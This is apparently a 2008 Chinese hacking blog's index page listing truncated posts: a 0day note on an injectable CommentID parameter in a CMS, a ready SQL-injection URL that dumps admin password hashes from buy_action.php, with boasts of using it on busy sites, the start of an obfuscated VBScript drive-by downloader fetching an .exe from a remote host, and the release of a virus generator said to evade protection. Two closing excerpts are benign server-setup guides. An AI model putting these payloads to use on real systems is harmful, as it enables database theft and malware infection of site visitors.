2008-03-06 16:05
2008-03-06 15:18
2008-03-05 13:30
CreateLive CMS Version 4.0 0day.doc
by:xiaok q:391232032.771044833 time: 2008-2-4 02:10 xpsp2 ie7 iis5.1 ……
致敬D.S.T的各位同志,致Hell-Phantom,致on thin ice,致老D,致Doom,致群里那帮有文化的流氓……
漏洞之一
来源kingcms\User\User_Comment.asp CommentID
'------------------------------------------------------------
sub SaveModify()
……
CommentID=Trim(Request("CommentID")) '注入
……
if CommentID="" then
FoundErr |
2008-03-05 13:25
2008-02-29 20:38
2008-02-29 20:36
注释:先注册..输入地址后。要等一会刷新就可以看到密码了
作者不知道是谁
问题出现在buy_action.php
没有对pid传递进行足够的重视
导致出现SQL注射问题!
注册地址
/member/index_do.php?fmdo=user&dopost=regnew
爆管理员密码
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*
用很大。 如果你找不到可以利用的 那就是自己RP问题
反正 我们是找到很多了,而且是流量比较大的站 |
2008-02-29 14:22
第一个:06014
<html>
<title>Cike</title>
<script language="VBScript">
on error resume next
Cike="http://xxx.com/admin/xx.exe"
dl = Cike
Set df = document.createElement("ob"&"ject")
df.setAttribute "classid", "clsid:BD96C55"&"6-65A3-11D0-983A- |
2008-02-28 17:31
软件作者:naitm
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
我偶然得到一个机器狗病毒的样本,于是很邪恶的做了一个生成器。
我想这东西,肯定已经有人做了生成器出来了,但是就是不肯共享出来,那就让我放一个出来吧。
注意:URL内要填的是下载文件的列表,亲测可穿冰点
|
2008-02-21 12:49
由于各种原因,我们有时候需要在一个IP地址上建立多个web站点,在IIS5中,我们可能通过简单的设置达到这个目标.
在IIS中,每个 Web 站点都具有唯一的、由三个部分组成的标识,用来接收和响应请求:
(1) IP地址
(2)端口号
(3)主机头名。
在IIS中,在一个IP地址上建立多个独立的web站点,通常有两种方法,本文以以例子的形式介绍主机头法,使用这种方法可以建立起专业的虚拟主机.
环境:假设沧海公司(呵呵...)用一台win2000服务器提供虚拟主机服务,地址是192.168.1.10.在这台服 |
2008-02-21 12:48
先从各官方网站下了APACHE2.050、PHP5、MYSQL4.0.20(现在是5、有一些改变,比如设置变成用向导next的方法)、PHPMYADMIN2.57 (最好下载最新客户端软件这里不是最新的)
apache_2.0.50-win32-x86-no_ssl.msi
php-5.0.0-Win32.zip
mysql-4.0.20d-win.zip
phpMyAdmin-2.5.7.zip
操作系统 win2003(2000、xp皆可) 系统盘为: D盘
第一步: 安装apache 并配置支持PHP
点击安装文件apache_2.0.50-win32-x86-no_ssl.msi
将ap |
|
| 
